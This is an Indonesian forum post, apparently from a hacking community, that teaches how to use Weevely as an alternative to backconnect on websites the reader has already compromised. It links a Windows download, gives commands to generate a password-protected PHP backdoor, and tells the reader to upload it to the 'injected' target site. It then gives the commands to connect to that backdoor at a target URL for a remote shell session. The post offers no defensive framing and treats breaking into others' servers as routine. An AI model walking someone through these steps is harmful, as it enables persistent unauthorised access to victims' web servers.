Weevely ( alternatif BackConnect )

[j0ck3r]

Selama ini seorang attacker setelah mendapat target dan berhasil upload shell selalu melakukan backconnect untuk melakukan rooting target,tapi setahu saya ( yg saya tahu lho ya ) untuk melakukan backconnect harus mempunyai IP PUBLIC,lha yg pake koneksi modem kaya saya jelas gak bisa ( atau tepatnya belum tahu caranya ),tapi kini ada alternatif lain yaitu menggunakan Weevely.Pada BT tools ini sudah tersedia,kalau versi windows bisa download di:

Code: Select all

http://www.mediafire.com/?bdye3fa98gg72sz

install dulu python dan pyreadline-2.0.win32 bagi yg pake windows
Pertama-tama kita ciptakan backdoor menggunakan weevely,pada kasus ini saya beri passsword j0ck3r jadi perintahnya:

Code: Select all

./weevely.py generate j0ck3r

versi windows

Code: Select all

main.py -g -o nama_backdoor.php password

lalu setelah tercipta backdoornya,kita upload ke website injekan kita tadi,lalu kembali ke weevely,untuk menciptakan koneksi kita ketikkan perintah:

Code: Select all

./weevely.py www.target.com/path/weevely.php j0ck3r

versi windows

Code: Select all

main.py -t -u www.target.com/path/nama_backdoor.php -p password

nha jadilah sesi backconnect